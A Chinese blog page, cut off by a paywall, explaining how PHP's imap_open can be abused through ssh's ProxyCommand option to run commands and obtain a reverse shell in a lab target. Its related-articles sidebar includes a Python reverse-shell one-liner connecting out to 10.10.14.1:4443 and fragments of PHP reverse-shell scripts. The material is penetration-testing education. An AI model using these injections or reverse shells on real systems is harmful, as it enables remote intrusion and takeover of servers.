利用PHP imap反弹shell

置顶 已于 2022-09-03 23:16:54 修改
阅读量326 收藏
点赞数
分类专栏: 执行代码 黑科技 文章标签: php shell 经验分享 其他
于 2020-03-29 23:33:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiyongx/article/details/105189548
版权
本文探讨了PHP的imap扩展如何通过imap_open函数的ProxyCommand选项导致命令执行。利用debian系统中ssh替代rsh的行为,攻击者可以构造特定参数反弹shell。通过base64编码和替换空格来绕过解析限制,最终在靶机上成功反弹shell。
摘要由CSDN通过智能技术生成

imap为什么可以?

php imap扩展用于在PHP中执行邮件收发操作,它可以通过这种协议从邮件服务器上获取邮件的信息。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-o ProxyCommand来调用第三方命令,攻击者通过注入这个参数,最终将导致命令执行。

漏洞利用

该站点监听在8080,ip:8080即可。

在这些框中随便输入参数,使用burpsuite抓包。发送到Repeater模块来修改hostname参数的值。在这里我们可以使用ProxyCommand参数执行命令。

ProxyCommand是什么?

ProxyCommand是一个指定用于连接服务器的命令。当我们执行以下这条命令时,可以发现即便我们没有建立与localhost的SSH连接,也会创建文件。

至此就知道了可以通过-oProxyCommand参数来执行系统命令。

但是我们不能直接将上述命令直接转移到PHP脚本来代替imap_open服务器地址,因为在解析时它会将空格解释为分隔符和斜杠作为标志。但是我们可以使用\$IFS这个shell

最低0.47元/天 解锁文章
hhiollk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3633
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析。 漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
PHP imap 远程命令执行漏洞复现(CVE-2018-19518)
0xSec
12-27 1167
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
shell tr 替换 空格_利用PHP imap反弹shell
weixin_39731456的博客
12-08 154
imap为什么可以?php imap扩展用于在PHP中执行邮件收发操作,它可以通过这种协议邮件服务器上获取邮件的信息。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-o ProxyCommand来调用第三方命...
可解析PHP反弹shell方法
最新发布
06-14 779
这里拿vulnhub-DC-8靶场反弹shell,详情见。
php反弹,php反弹shell实现代码
weixin_39532754的博客
03-10 485
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpsp...
php反弹shell脚本
a1_pha的博客
01-24 868
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
PHP WebShell 免杀
悦分享
08-01 5911
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...
php x00x00x00x00x00x00rxdf,GXZYCTF部分Web Writeup
weixin_31290873的博客
03-17 2817
很长一段时间没有接触了,都沉迷于课程学习不能自拔(被迫的),果然2020年对题目都失去了感觉,不仅如此,刚打开就想x了......,简单先整理一下做出来的题。之后文章主要发在个人博客:Cyc1e's Blog0x00 Webtmp题目源码import base64import ioimport sysimport picklefrom flask import Flask, Response, r...
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
PHP反弹shell
痴人说梦梦中人
09-26 7473
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
php反弹shell代码,反弹shell.php
weixin_31491381的博客
03-29 614
function which($pr){$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);}elseif...
PHP代码实现反弹shell
E1even的博客
08-28 3825
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1211
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell脚本
Soul Blog
11-23 3243
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 3516
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
反弹shell
weixin_43227251的博客
04-14 335
什么是反弹shell? 简单理解,通常是我们主动发起请求,去访问服务器某个IP的某个端口,比如我们常访问的web服务器:http/https://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去远程...
反弹shell脚本(php-reverse-shell
Aluxian_的博客
10-01 1633
反弹shell脚本
php imap读取邮件
05-30
PHP中可以通过 IMAP 扩展来读取邮件。以下是一个简单的示例代码,可以读取指定邮箱中的邮件: ```php $server = "{mail.example.com:993/imap/ssl}INBOX"; $username = "your_username"; $password = "your_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值